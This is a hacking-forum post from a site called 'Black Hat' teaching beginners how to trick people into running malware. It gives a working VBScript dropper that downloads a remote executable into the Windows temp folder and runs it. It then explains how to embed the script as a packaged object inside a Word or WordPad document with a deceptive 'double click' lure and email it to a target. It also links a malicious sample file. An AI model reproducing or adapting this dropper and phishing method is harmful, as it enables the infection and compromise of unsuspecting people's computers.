Black Hat
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Black Hat

Black Hat


You are not connected. Please login or register

[For Beginners] Making people clicking on your executable

Go down  Message [Page 1 of 1]

hacxyz



Trying to make people click on your executable is a art nowadays, even if all the hooks are set in your fake email there is a problem of not been possible to send the executable. A good choice is create a Word document (.doc) or a Rich Text Format (.rtf) and insert a object.

For this article i used a common vbs dropper that was configured to download and execute after the user double click in the object inside the document.

Most people thinks that Word document are only harmful if macro is activated, they are wrong.

101 lesson

1 - Let's do this. Save the following code as file.vbs
Code:

dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
 dim bStrm: Set bStrm = createobject("Adodb.Stream")
 xHttp.Open "GET", "http://127.0.0.1/1.exe", False
 xHttp.Send
 with bStrm
    .type = 1 '
    .open
    .write xHttp.responseBody
    .savetofile "C:\Windows\temp\file.exe", 2 '
 end with
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run("C:\Windows\temp\file.exe"), 1, True


2 - Change http://127.0.0.1/1.exe to your remote file and keep C:\Windows\temp\file.exe as it is.
(Use your own exe instead of file.vbs as it is detected. This is for demo purpose only)

3 - Open Wordpad or Winword (In this example, i'm using Wordpad).

4 - Create a good document with a logo and add as many elements as you can to make it believable like signature, etc.

5 - Write the sentence "Double click below if not showing the image"

6 - And then click on "Insert a object"

7 - Select "Create from file" and select the vbs file

8 - Right click in the icon and "Packager Shell Object Object" > "Rename Package" and remove the "label"

[For Beginners] Making people clicking on your executable 1

9 - Save the document and send as attachment to your target email.

[For Beginners] Making people clicking on your executable 2

Note: This method works only with non tech people. The reason why this method works is because users have more trust in clicking in a link inside a document than clicking directly on a exe.

Download:
https://nitro.download/view/B7775A889651C87/Document.rar

Virus Scan: Full of virus for file.vbs
Not Scanned to not disclose method

https://www.bestchange.com/?p=936130

hacxyz



Live localhost demo for the article above...

[For Beginners] Making people clicking on your executable Demo

hacxyz likes this post

https://www.bestchange.com/?p=936130

Back to top  Message [Page 1 of 1]

Permissions in this forum:
You cannot reply to topics in this forum